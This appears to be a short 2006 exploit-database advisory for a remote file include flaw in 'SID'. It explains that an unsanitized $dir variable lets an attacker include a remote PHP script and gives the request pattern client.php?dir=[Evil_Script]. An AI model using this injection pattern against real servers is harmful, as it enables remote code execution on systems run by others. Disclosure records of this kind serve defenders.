vendor:
SID
by:
Kw3[R]Ln
N/A
CVSS
N/A
Remote File Include
CWE
Product Name: SID
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2006
SID – [dir] Remote File Include Vulnerability
Variable $dir not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/client.php?dir=[Evil_Script]